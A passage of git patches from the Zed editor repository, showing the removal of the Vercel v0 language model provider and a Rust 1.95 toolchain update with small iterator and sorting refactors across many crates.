Err(LanguageModelCompletionError::NoApiKey { provider }); - }; - let request = open_ai::stream_completion( - http_client.as_ref(), - provider.0.as_str(), - &api_url, - &api_key, - request, - ); - let response = request.await?; - Ok(response) - }); - - 
async move { Ok(future.await?.boxed()) }.boxed() - } -} - -impl LanguageModel for VercelLanguageModel { - fn id(&self) -> LanguageModelId { - self.id.clone() - } - - fn name(&self) -> LanguageModelName { - LanguageModelName::from(self.model.display_name().to_string()) - } - - fn provider_id(&self) -> LanguageModelProviderId { - PROVIDER_ID - } - - fn provider_name(&self) -> LanguageModelProviderName { - PROVIDER_NAME - } - - fn supports_tools(&self) -> bool { - true - } - - fn supports_images(&self) -> bool { - true - } - - fn supports_streaming_tools(&self) -> bool { - true - } - - fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { - match choice { - LanguageModelToolChoice::Auto - | LanguageModelToolChoice::Any - | LanguageModelToolChoice::None => true, - } - } - - fn telemetry_id(&self) -> String { - format!("vercel/{}", self.model.id()) - } - - fn max_token_count(&self) -> u64 { - self.model.max_token_count() - } - - fn max_output_tokens(&self) -> Option { - self.model.max_output_tokens() - } - - fn stream_completion( - &self, - request: LanguageModelRequest, - cx: &AsyncApp, - ) -> BoxFuture< - 'static, - Result< - futures::stream::BoxStream< - 'static, - Result, - >, - LanguageModelCompletionError, - >, - > { - let request = crate::provider::open_ai::into_open_ai( - request, - self.model.id(), - self.model.supports_parallel_tool_calls(), - self.model.supports_prompt_cache_key(), - self.max_output_tokens(), - None, - false, - ); - let completions = self.stream_completion(request, cx); - async move { - let mapper = crate::provider::open_ai::OpenAiEventMapper::new(); - Ok(mapper.map_stream(completions.await?).boxed()) - } - .boxed() - } -} - -struct ConfigurationView { - api_key_editor: Entity, - state: Entity, - load_credentials_task: Option>, -} - -impl ConfigurationView { - fn new(state: Entity, window: &mut Window, cx: &mut Context) -> Self { - let api_key_editor = cx.new(|cx| { - InputField::new( - window, - cx, - 
"v1:0000000000000000000000000000000000000000000000000", - ) - .label("API key") - }); - - cx.observe(&state, |_, _, cx| { - cx.notify(); - }) - .detach(); - - let load_credentials_task = Some(cx.spawn_in(window, { - let state = state.clone(); - async move |this, cx| { - if let Some(task) = Some(state.update(cx, |state, cx| state.authenticate(cx))) { - // We don't log an error, because "not signed in" is also an error. - let _ = task.await; - } - this.update(cx, |this, cx| { - this.load_credentials_task = None; - cx.notify(); - }) - .log_err(); - } - })); - - Self { - api_key_editor, - state, - load_credentials_task, - } - } - - fn save_api_key(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { - let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string(); - if api_key.is_empty() { - return; - } - - // url changes can cause the editor to be displayed again - self.api_key_editor - .update(cx, |editor, cx| editor.set_text("", window, cx)); - - let state = self.state.clone(); - cx.spawn_in(window, async move |_, cx| { - state - .update(cx, |state, cx| state.set_api_key(Some(api_key), cx)) - .await - }) - .detach_and_log_err(cx); - } - - fn reset_api_key(&mut self, window: &mut Window, cx: &mut Context) { - self.api_key_editor - .update(cx, |input, cx| input.set_text("", window, cx)); - - let state = self.state.clone(); - cx.spawn_in(window, async move |_, cx| { - state - .update(cx, |state, cx| state.set_api_key(None, cx)) - .await - }) - .detach_and_log_err(cx); - } - - fn should_render_editor(&self, cx: &mut Context) -> bool { - !self.state.read(cx).is_authenticated() - } -} - -impl Render for ConfigurationView { - fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { - let env_var_set = self.state.read(cx).api_key_state.is_from_env_var(); - let configured_card_label = if env_var_set { - format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable") - } else { - let api_url = 
VercelLanguageModelProvider::api_url(cx); - if api_url == VERCEL_API_URL { - "API key configured".to_string() - } else { - format!("API key configured for {}", api_url) - } - }; - - let api_key_section = if self.should_render_editor(cx) { - v_flex() - .on_action(cx.listener(Self::save_api_key)) - .child(Label::new("To use Zed's agent with Vercel v0, you need to add an API key. Follow these steps:")) - .child( - List::new() - .child( - ListBulletItem::new("") - .child(Label::new("Create one by visiting")) - .child(ButtonLink::new("Vercel v0's console", "https://v0.dev/chat/settings/keys")) - ) - .child( - ListBulletItem::new("Paste your API key below and hit enter to start using the agent") - ), - ) - .child(self.api_key_editor.clone()) - .child( - Label::new(format!( - "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed." - )) - .size(LabelSize::Small) - .color(Color::Muted), - ) - .child( - Label::new("Note that Vercel v0 is a custom OpenAI-compatible provider.") - .size(LabelSize::Small) - .color(Color::Muted), - ) - .into_any_element() - } else { - ConfiguredApiCard::new(configured_card_label) - .disabled(env_var_set) - .when(env_var_set, |this| { - this.tooltip_label(format!("To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable.")) - }) - .on_click(cx.listener(|this, _, window, cx| this.reset_api_key(window, cx))) - .into_any_element() - }; - - if self.load_credentials_task.is_some() { - div().child(Label::new("Loading credentials…")).into_any() - } else { - v_flex().size_full().child(api_key_section).into_any() - } - } -} diff --git a/crates/language_models/src/settings.rs b/crates/language_models/src/settings.rs index a8d1b384d34623..d7272a483becf4 100644 --- a/crates/language_models/src/settings.rs +++ b/crates/language_models/src/settings.rs @@ -8,8 +8,7 @@ use crate::provider::{ deepseek::DeepSeekSettings, google::GoogleSettings, lmstudio::LmStudioSettings, mistral::MistralSettings, 
ollama::OllamaSettings, open_ai::OpenAiSettings, open_ai_compatible::OpenAiCompatibleSettings, open_router::OpenRouterSettings, - opencode::OpenCodeSettings, vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, - x_ai::XAiSettings, + opencode::OpenCodeSettings, vercel_ai_gateway::VercelAiGatewaySettings, x_ai::XAiSettings, }; #[derive(Debug, RegisterSetting)] @@ -25,7 +24,6 @@ pub struct AllLanguageModelSettings { pub open_router: OpenRouterSettings, pub openai: OpenAiSettings, pub openai_compatible: HashMap, OpenAiCompatibleSettings>, - pub vercel: VercelSettings, pub vercel_ai_gateway: VercelAiGatewaySettings, pub x_ai: XAiSettings, pub zed_dot_dev: ZedDotDevSettings, @@ -47,7 +45,6 @@ impl settings::Settings for AllLanguageModelSettings { let open_router = language_models.open_router.unwrap(); let openai = language_models.openai.unwrap(); let openai_compatible = language_models.openai_compatible.unwrap(); - let vercel = language_models.vercel.unwrap(); let vercel_ai_gateway = language_models.vercel_ai_gateway.unwrap(); let x_ai = language_models.x_ai.unwrap(); let zed_dot_dev = language_models.zed_dot_dev.unwrap(); @@ -115,10 +112,6 @@ impl settings::Settings for AllLanguageModelSettings { ) }) .collect(), - vercel: VercelSettings { - api_url: vercel.api_url.unwrap(), - available_models: vercel.available_models.unwrap_or_default(), - }, vercel_ai_gateway: VercelAiGatewaySettings { api_url: vercel_ai_gateway.api_url.unwrap(), available_models: vercel_ai_gateway.available_models.unwrap_or_default(), diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 12756c9bad5d9b..2cdeb1e94e1a0b 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -462,7 +462,6 @@ impl JsonSchema for LanguageModelProviderSetting { "ollama", "openai", "openrouter", - "vercel", "vercel_ai_gateway", "x_ai", "zed.dev" diff --git a/crates/settings_content/src/language_model.rs 
b/crates/settings_content/src/language_model.rs index 619e9d72f84703..0fe922ae0b881e 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -21,7 +21,6 @@ pub struct AllLanguageModelSettingsContent { pub open_router: Option, pub openai: Option, pub openai_compatible: Option, OpenAiCompatibleSettingsContent>>, - pub vercel: Option, pub vercel_ai_gateway: Option, pub x_ai: Option, #[serde(rename = "zed.dev")] @@ -330,23 +329,6 @@ impl Default for OpenAiCompatibleModelCapabilities { } } -#[with_fallible_options] -#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] -pub struct VercelSettingsContent { - pub api_url: Option, - pub available_models: Option>, -} - -#[with_fallible_options] -#[derive(Clone, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)] -pub struct VercelAvailableModel { - pub name: String, - pub display_name: Option, - pub max_tokens: u64, - pub max_output_tokens: Option, - pub max_completion_tokens: Option, -} - #[with_fallible_options] #[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] pub struct VercelAiGatewaySettingsContent { diff --git a/crates/vercel/Cargo.toml b/crates/vercel/Cargo.toml deleted file mode 100644 index 6f6acc7f219f39..00000000000000 --- a/crates/vercel/Cargo.toml +++ /dev/null @@ -1,23 +0,0 @@ -[package] -name = "vercel" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "GPL-3.0-or-later" - -[lints] -workspace = true - -[lib] -path = "src/vercel.rs" -test = false - -[features] -default = [] -schemars = ["dep:schemars"] - -[dependencies] -anyhow.workspace = true -schemars = { workspace = true, optional = true } -serde.workspace = true -strum.workspace = true diff --git a/crates/vercel/LICENSE-GPL b/crates/vercel/LICENSE-GPL deleted file mode 120000 index 89e542f750cd38..00000000000000 --- a/crates/vercel/LICENSE-GPL +++ /dev/null @@ -1 +0,0 @@ 
-../../LICENSE-GPL \ No newline at end of file diff --git a/crates/vercel/src/vercel.rs b/crates/vercel/src/vercel.rs deleted file mode 100644 index 02ac291b9dd54a..00000000000000 --- a/crates/vercel/src/vercel.rs +++ /dev/null @@ -1,78 +0,0 @@ -use anyhow::Result; -use serde::{Deserialize, Serialize}; -use strum::EnumIter; - -pub const VERCEL_API_URL: &str = "https://api.v0.dev/v1"; - -#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] -#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)] -pub enum Model { - #[default] - #[serde(rename = "v0-1.5-md")] - VZeroOnePointFiveMedium, - #[serde(rename = "custom")] - Custom { - name: String, - /// The name displayed in the UI, such as in the agent panel model dropdown menu. - display_name: Option, - max_tokens: u64, - max_output_tokens: Option, - max_completion_tokens: Option, - }, -} - -impl Model { - pub fn default_fast() -> Self { - Self::VZeroOnePointFiveMedium - } - - pub fn from_id(id: &str) -> Result { - match id { - "v0-1.5-md" => Ok(Self::VZeroOnePointFiveMedium), - invalid_id => anyhow::bail!("invalid model id '{invalid_id}'"), - } - } - - pub fn id(&self) -> &str { - match self { - Self::VZeroOnePointFiveMedium => "v0-1.5-md", - Self::Custom { name, .. } => name, - } - } - - pub fn display_name(&self) -> &str { - match self { - Self::VZeroOnePointFiveMedium => "v0-1.5-md", - Self::Custom { - name, display_name, .. - } => display_name.as_ref().unwrap_or(name), - } - } - - pub fn max_token_count(&self) -> u64 { - match self { - Self::VZeroOnePointFiveMedium => 128_000, - Self::Custom { max_tokens, .. } => *max_tokens, - } - } - - pub fn max_output_tokens(&self) -> Option { - match self { - Self::VZeroOnePointFiveMedium => Some(32_000), - Self::Custom { - max_output_tokens, .. - } => *max_output_tokens, - } - } - - pub fn supports_parallel_tool_calls(&self) -> bool { - match self { - Self::VZeroOnePointFiveMedium => true, - Model::Custom { .. 
} => false, - } - } - - pub fn supports_prompt_cache_key(&self) -> bool { - false - } -} diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index b38874730ecd5b..b5dd98afe1a6b6 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -34,7 +34,6 @@ Zed supports these providers with your own API keys: - [OpenCode](#opencode) - [OpenRouter](#openrouter) - [Vercel AI Gateway](#vercel-ai-gateway) -- [Vercel](#vercel-v0) - [xAI](#xai) ### Amazon Bedrock {#amazon-bedrock} @@ -830,18 +829,6 @@ You can also set a custom endpoint for Vercel AI Gateway in your settings file: } ``` -### Vercel v0 {#vercel-v0} - -[Vercel v0](https://v0.app/docs/api/model) is a model for generating full-stack apps, with framework-aware completions for stacks like Next.js and Vercel. -It supports text and image inputs and provides fast streaming responses. - -The v0 models are [OpenAI-compatible models](#openai-api-compatible), and Vercel appears as a dedicated provider in the panel's settings view. - -To start using it with Zed, ensure you have first created a [v0 API key](https://v0.dev/chat/settings/keys). -Once you have it, paste it directly into the Vercel provider section in the panel's settings view. - -You should then find it as `v0-1.5-md` in the model dropdown in the Agent Panel. - ### xAI {#xai} Zed includes a dedicated [xAI](https://x.ai/) provider. You can use your own API key to access Grok models. 
From 748575d1facf4de3428b3548a5a0d656f4f903d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Yara=20=F0=9F=8F=B3=EF=B8=8F=E2=80=8D=E2=9A=A7=EF=B8=8F?= Date: Wed, 29 Apr 2026 12:27:47 +0200 Subject: [PATCH 097/231] Rust 1.95 (#55104) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- codebook.toml | 1 - crates/agent_ui/src/thread_metadata_store.rs | 4 +-- crates/dap_adapters/src/javascript.rs | 2 +- crates/debugger_ui/src/tests/console.rs | 2 +- crates/denoise/src/lib.rs | 8 ++--- crates/diagnostics/src/buffer_diagnostics.rs | 33 +++++++++---------- crates/diagnostics/src/diagnostics.rs | 9 +++-- crates/edit_prediction/src/edit_prediction.rs | 2 +- .../src/edit_prediction_tests.rs | 4 +-- .../src/filter_languages.rs | 8 ++--- crates/editor/src/display_map/block_map.rs | 4 +-- crates/editor/src/display_map/tab_map.rs | 4 +++ crates/editor/src/document_colors.rs | 8 ++--- crates/editor/src/editor.rs | 4 +-- crates/editor/src/runnables.rs | 2 +- crates/file_finder/src/file_finder.rs | 5 +-- crates/git/src/blame.rs | 2 +- crates/git_ui/src/project_diff.rs | 2 +- .../src/json_schema_store.rs | 2 +- .../src/syntax_map/syntax_map_tests.rs | 6 ++-- crates/languages/src/python.rs | 2 +- crates/multi_buffer/src/multi_buffer.rs | 5 +-- crates/multi_buffer/src/multi_buffer_tests.rs | 4 +-- crates/multi_buffer/src/path_key.rs | 2 +- crates/project/src/lsp_store.rs | 4 +-- .../tests/integration/project_tests.rs | 2 +- crates/recent_projects/src/recent_projects.rs | 2 +- crates/snippet_provider/src/lib.rs | 4 +-- crates/terminal_view/src/persistence.rs | 4 +-- crates/vim/src/helix/surround.rs | 2 +- 
crates/vim/src/state.rs | 2 +- crates/worktree/src/worktree.rs | 2 +- crates/zeta_prompt/src/multi_region.rs | 9 +++-- flake.lock | 6 ++-- rust-toolchain.toml | 2 +- 35 files changed, 73 insertions(+), 91 deletions(-) delete mode 100644 codebook.toml diff --git a/codebook.toml b/codebook.toml deleted file mode 100644 index 57cdd2569c350b..00000000000000 --- a/codebook.toml +++ /dev/null @@ -1 +0,0 @@ -words = ["breakpoint"] diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index ff6eb3b98ec67d..fee098f3760e96 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -162,7 +162,7 @@ fn migrate_thread_metadata(cx: &mut App) -> Task> { .push(entry); } for entries in per_project.values_mut() { - entries.sort_by(|a, b| b.updated_at.cmp(&a.updated_at)); + entries.sort_by_key(|entry| std::cmp::Reverse(entry.updated_at)); for entry in entries.iter_mut().take(5) { entry.archived = false; } @@ -2321,7 +2321,7 @@ mod tests { .filter(|m| *m.folder_paths() == project_a_paths) .collect(); assert_eq!(project_a_entries.len(), 7); - project_a_entries.sort_by(|a, b| b.updated_at.cmp(&a.updated_at)); + project_a_entries.sort_by_key(|entry| std::cmp::Reverse(entry.updated_at)); for entry in &project_a_entries[..5] { assert!( diff --git a/crates/dap_adapters/src/javascript.rs b/crates/dap_adapters/src/javascript.rs index 68f5ca7e797664..8bdcf52807b369 100644 --- a/crates/dap_adapters/src/javascript.rs +++ b/crates/dap_adapters/src/javascript.rs @@ -103,7 +103,7 @@ impl JsDebugAdapter { if let Some(env) = configuration.get("env").cloned() && let Ok(env) = serde_json::from_value::>(env) { - envs.extend(env.into_iter()); + envs.extend(env); } configuration diff --git a/crates/debugger_ui/src/tests/console.rs b/crates/debugger_ui/src/tests/console.rs index 9e672be080aad4..b3a8fb0b6b03e9 100644 --- a/crates/debugger_ui/src/tests/console.rs +++ 
b/crates/debugger_ui/src/tests/console.rs @@ -328,7 +328,7 @@ async fn test_escape_code_processing(executor: BackgroundExecutor, cx: &mut Test let text_highlights = editor.update(cx, |editor, cx| { let mut text_highlights = editor.all_text_highlights(window, cx).into_iter().flat_map(|(_, ranges)| ranges).collect::>(); - text_highlights.sort_by(|a, b| a.start.cmp(&b.start)); + text_highlights.sort_by_key(|hl| hl.start); text_highlights }); pretty_assertions::assert_eq!( diff --git a/crates/denoise/src/lib.rs b/crates/denoise/src/lib.rs index f6cbf0fadf1f21..e92831b9657d99 100644 --- a/crates/denoise/src/lib.rs +++ b/crates/denoise/src/lib.rs @@ -118,12 +118,8 @@ fn run_neural_denoiser( input_rx: mpsc::Receiver<[f32; BLOCK_SHIFT]>, ) { let mut engine = Engine::new(); - loop { - let Ok(sub_block) = input_rx.recv() else { - // tx must have dropped, stop thread - break; - }; - + // until tx is dropped + while let Ok(sub_block) = input_rx.recv() { let denoised_sub_block = engine.feed(&sub_block); if denoised_tx.send(denoised_sub_block).is_err() { break; diff --git a/crates/diagnostics/src/buffer_diagnostics.rs b/crates/diagnostics/src/buffer_diagnostics.rs index 040aeae4742e18..e703e193c312e9 100644 --- a/crates/diagnostics/src/buffer_diagnostics.rs +++ b/crates/diagnostics/src/buffer_diagnostics.rs @@ -542,23 +542,22 @@ impl BufferDiagnosticsEditor { // display map for the new diagnostics. Update the `blocks` // property before finishing, to ensure the blocks are removed // on the next execution. 
- let editor_blocks = - anchor_ranges - .into_iter() - .zip(blocks.into_iter()) - .map(|(anchor, block)| { - let editor = buffer_diagnostics_editor.editor.downgrade(); - - BlockProperties { - placement: BlockPlacement::Near(anchor.start), - height: Some(1), - style: BlockStyle::Flex, - render: Arc::new(move |block_context| { - block.render_block(editor.clone(), block_context) - }), - priority: 1, - } - }); + let editor_blocks = anchor_ranges + .into_iter() + .zip(blocks) + .map(|(anchor, block)| { + let editor = buffer_diagnostics_editor.editor.downgrade(); + + BlockProperties { + placement: BlockPlacement::Near(anchor.start), + height: Some(1), + style: BlockStyle::Flex, + render: Arc::new(move |block_context| { + block.render_block(editor.clone(), block_context) + }), + priority: 1, + } + }); let block_ids = buffer_diagnostics_editor.editor.update(cx, |editor, cx| { editor.display_map.update(cx, |display_map, cx| { diff --git a/crates/diagnostics/src/diagnostics.rs b/crates/diagnostics/src/diagnostics.rs index 49e17e69b00c60..4ee8259dd695d8 100644 --- a/crates/diagnostics/src/diagnostics.rs +++ b/crates/diagnostics/src/diagnostics.rs @@ -667,10 +667,8 @@ impl ProjectDiagnosticsEditor { } } - let editor_blocks = anchor_ranges - .into_iter() - .zip_eq(result_blocks.into_iter()) - .filter_map(|(anchor, block)| { + let editor_blocks = anchor_ranges.into_iter().zip_eq(result_blocks).filter_map( + |(anchor, block)| { let block = block?; let editor = this.editor.downgrade(); Some(BlockProperties { @@ -680,7 +678,8 @@ impl ProjectDiagnosticsEditor { render: Arc::new(move |bcx| block.render_block(editor.clone(), bcx)), priority: 1, }) - }); + }, + ); let block_ids = this.editor.update(cx, |editor, cx| { editor.display_map.update(cx, |display_map, cx| { diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index 824c45036b7fcc..6c98e296ef4256 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ 
b/crates/edit_prediction/src/edit_prediction.rs @@ -2514,7 +2514,7 @@ impl EditPredictionStore { .collect() }); - candidates.sort_by(|a, b| b.1.cmp(&a.1)); + candidates.sort_by_key(|c| std::cmp::Reverse(c.1)); for (path, _) in candidates { let candidate_buffer = project diff --git a/crates/edit_prediction/src/edit_prediction_tests.rs b/crates/edit_prediction/src/edit_prediction_tests.rs index be6ea025496ee1..00d52023f4dab7 100644 --- a/crates/edit_prediction/src/edit_prediction_tests.rs +++ b/crates/edit_prediction/src/edit_prediction_tests.rs @@ -3315,8 +3315,7 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) { // Let the worker process the channel message before we start advancing. cx.run_until_parked(); - let mut region_a_edit_offset = 5; - for _ in 0..3 { + for region_a_edit_offset in (5..).take(3) { // Edit inside region A (not at the boundary) so `last_edit_at` is // updated before the worker's next wake. buffer.update(cx, |buffer, cx| { @@ -3326,7 +3325,6 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) { cx, ); }); - region_a_edit_offset += 1; cx.run_until_parked(); cx.executor() diff --git a/crates/edit_prediction_cli/src/filter_languages.rs b/crates/edit_prediction_cli/src/filter_languages.rs index 989a112a50aa2d..cdf503fa23c95d 100644 --- a/crates/edit_prediction_cli/src/filter_languages.rs +++ b/crates/edit_prediction_cli/src/filter_languages.rs @@ -168,7 +168,7 @@ fn get_all_languages(extension_map: &HashMap) -> Vec<(String, Ve } let mut result: Vec<_> = language_to_extensions.into_iter().collect(); - result.sort_by(|a, b| a.0.to_lowercase().cmp(&b.0.to_lowercase())); + result.sort_by_key(|res| res.0.to_lowercase()); for (_, extensions) in &mut result { extensions.sort(); } @@ -380,7 +380,7 @@ pub fn run_filter_languages( if let Some(top_n) = args.show_top_excluded { if !excluded_extensions.is_empty() { let mut sorted: Vec<_> = excluded_extensions.into_iter().collect(); - sorted.sort_by(|a, b| b.1.cmp(&a.1)); + 
sorted.sort_by_key(|res| std::cmp::Reverse(res.1)); eprintln!("\nTop {} excluded extensions:", top_n.min(sorted.len())); for (ext, count) in sorted.into_iter().take(top_n) { eprintln!(" {:>6} .{}", count, ext); @@ -439,7 +439,7 @@ fn run_stats(input: &Path, extension_map: &HashMap) -> Result<() } let mut sorted_counts: Vec<_> = language_counts.into_iter().collect(); - sorted_counts.sort_by(|a, b| b.1.cmp(&a.1)); + sorted_counts.sort_by_key(|res| std::cmp::Reverse(res.1)); println!("Language distribution ({} total examples):", total_count); println!(); @@ -452,7 +452,7 @@ fn run_stats(input: &Path, extension_map: &HashMap) -> Result<() println!(); println!("Unknown extensions:"); let mut sorted_unknown: Vec<_> = unknown_extensions.into_iter().collect(); - sorted_unknown.sort_by(|a, b| b.1.cmp(&a.1)); + sorted_unknown.sort_by_key(|res| std::cmp::Reverse(res.1)); for (ext, count) in sorted_unknown.iter().take(30) { println!(" {:>6} .{}", count, ext); } diff --git a/crates/editor/src/display_map/block_map.rs b/crates/editor/src/display_map/block_map.rs index c3dbfa4f6dd6d8..7664ff4d2d7121 100644 --- a/crates/editor/src/display_map/block_map.rs +++ b/crates/editor/src/display_map/block_map.rs @@ -4398,8 +4398,7 @@ mod tests { let mut expected_longest_rows_in_range = vec![]; let mut longest_line_len_in_range = 0; - let mut row = start_row as u32; - for line in &expected_lines[start_row..end_row] { + for (row, line) in (start_row as u32..).zip(&expected_lines[start_row..end_row]) { let line_char_count = line.chars().count() as isize; match line_char_count.cmp(&longest_line_len_in_range) { Ordering::Less => {} @@ -4410,7 +4409,6 @@ mod tests { expected_longest_rows_in_range.push(row); } } - row += 1; } let longest_row_in_range = blocks_snapshot diff --git a/crates/editor/src/display_map/tab_map.rs b/crates/editor/src/display_map/tab_map.rs index bb0e642df380e0..24f0206cccd754 100644 --- a/crates/editor/src/display_map/tab_map.rs +++ 
b/crates/editor/src/display_map/tab_map.rs @@ -1577,6 +1577,10 @@ mod tests { let mut all_tab_stops = Vec::new(); let mut byte_offset = 1; let mut char_offset = 1; + #[expect( + clippy::explicit_counter_loop, + reason = "Lint does not account for char_offset being needed after the loop" + )] for ch in buffer_snapshot.text().chars() { if ch == '\t' { all_tab_stops.push(TabStop { diff --git a/crates/editor/src/document_colors.rs b/crates/editor/src/document_colors.rs index d62bb87404d454..4ce89f90c996e5 100644 --- a/crates/editor/src/document_colors.rs +++ b/crates/editor/src/document_colors.rs @@ -51,8 +51,8 @@ impl LspColorData { to_remove: Vec::new(), to_insert: self .buffer_colors - .iter() - .flat_map(|(_, buffer_colors)| buffer_colors.colors.iter()) + .values() + .flat_map(|buffer_colors| buffer_colors.colors.iter()) .map(|(range, color, id)| { Inlay::color( id.id(), @@ -120,8 +120,8 @@ impl LspColorData { Vec::new() } else { self.buffer_colors - .iter() - .flat_map(|(_, buffer_colors)| &buffer_colors.colors) + .values() + .flat_map(|buffer_colors| &buffer_colors.colors) .map(|(range, color, _)| { let display_range = range.clone().to_display_points(snapshot); let color = Hsla::from(Rgba { diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 42e4ebb606dfed..c9ca01c7878939 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -24465,8 +24465,8 @@ impl Editor { let snapshot = self.snapshot(window, cx); let mut used_highlight_orders = HashMap::default(); self.highlighted_rows - .iter() - .flat_map(|(_, highlighted_rows)| highlighted_rows.iter()) + .values() + .flat_map(|highlighted_rows| highlighted_rows.iter()) .fold( BTreeMap::::new(), |mut unique_rows, highlight| { diff --git a/crates/editor/src/runnables.rs b/crates/editor/src/runnables.rs index 25db455d462afd..7b0b4d572a5137 100644 --- a/crates/editor/src/runnables.rs +++ b/crates/editor/src/runnables.rs @@ -1288,7 +1288,7 @@ mod tests { .runnables .iter() 
.flat_map(|(_, (_, tasks))| { - tasks.iter().flat_map(|(_, runnable_tasks)| { + tasks.values().flat_map(|runnable_tasks| { runnable_tasks .templates .iter() diff --git a/crates/file_finder/src/file_finder.rs b/crates/file_finder/src/file_finder.rs index d75481f6f74880..66acefde69f122 100644 --- a/crates/file_finder/src/file_finder.rs +++ b/crates/file_finder/src/file_finder.rs @@ -612,10 +612,7 @@ impl Matches { // We build a sorted Vec, eliminating duplicate search matches. // Search matches with the same paths should have equal `ProjectPanelOrdMatch`, so we should // not have any duplicates after building the final list. - for new_match in new_history_matches - .into_values() - .chain(new_search_matches.into_iter()) - { + for new_match in new_history_matches.into_values().chain(new_search_matches) { match self.position(&new_match, currently_opened) { Ok(_duplicate) => continue, Err(i) => { diff --git a/crates/git/src/blame.rs b/crates/git/src/blame.rs index 7597e29aee8604..43627453f0ff2b 100644 --- a/crates/git/src/blame.rs +++ b/crates/git/src/blame.rs @@ -29,7 +29,7 @@ impl Blame { ) -> Result { let output = run_git_blame(git, path, content, line_ending).await?; let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + entries.sort_unstable_by_key(|entry| entry.range.start); let mut unique_shas = HashSet::default(); diff --git a/crates/git_ui/src/project_diff.rs b/crates/git_ui/src/project_diff.rs index 67d9a96b2d6746..3301fbc66f76fd 100644 --- a/crates/git_ui/src/project_diff.rs +++ b/crates/git_ui/src/project_diff.rs @@ -822,7 +822,7 @@ impl ProjectDiff { let mut buffers_to_fold = Vec::new(); - for (entry, path_key) in buffers_to_load.into_iter().zip(path_keys.into_iter()) { + for (entry, path_key) in buffers_to_load.into_iter().zip(path_keys) { if let Some((buffer, diff)) = entry.load.await.log_err() { // We might be lagging behind enough that all future entry.load futures are no longer pending. 
// If that is the case, this task will never yield, starving the foreground thread of execution time. diff --git a/crates/json_schema_store/src/json_schema_store.rs b/crates/json_schema_store/src/json_schema_store.rs index b0cd3c0b35c7ff..afe6c51e81182b 100644 --- a/crates/json_schema_store/src/json_schema_store.rs +++ b/crates/json_schema_store/src/json_schema_store.rs @@ -313,7 +313,7 @@ async fn resolve_dynamic_schema( .all_lsp_adapters() .into_iter() .map(|adapter| adapter.name()) - .chain(languages.available_lsp_adapter_names().into_iter()) + .chain(languages.available_lsp_adapter_names()) .map(|name| name.to_string()) .collect(); diff --git a/crates/language/src/syntax_map/syntax_map_tests.rs b/crates/language/src/syntax_map/syntax_map_tests.rs index 247076b6f25e3c..8bff7ce1415c00 100644 --- a/crates/language/src/syntax_map/syntax_map_tests.rs +++ b/crates/language/src/syntax_map/syntax_map_tests.rs @@ -1163,7 +1163,7 @@ fn test_random_edits( let layers = syntax_map.layers(&buffer); let reference_layers = reference_syntax_map.layers(&buffer); - for (edited_layer, reference_layer) in layers.into_iter().zip(reference_layers.into_iter()) { + for (edited_layer, reference_layer) in layers.into_iter().zip(reference_layers) { assert_eq!( edited_layer.node().to_sexp(), reference_layer.node().to_sexp() @@ -1326,9 +1326,7 @@ fn test_edit_sequence(language_name: &str, steps: &[&str], cx: &mut App) -> (Buf reference_layers.len(), "wrong number of layers at step {i}" ); - for (edited_layer, reference_layer) in - mutated_layers.into_iter().zip(reference_layers.into_iter()) - { + for (edited_layer, reference_layer) in mutated_layers.into_iter().zip(reference_layers) { assert_eq!( edited_layer.node().to_sexp(), reference_layer.node().to_sexp(), diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index dd059313b6d4f3..5cdff8654ff6b9 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -895,7 +895,7 @@ impl 
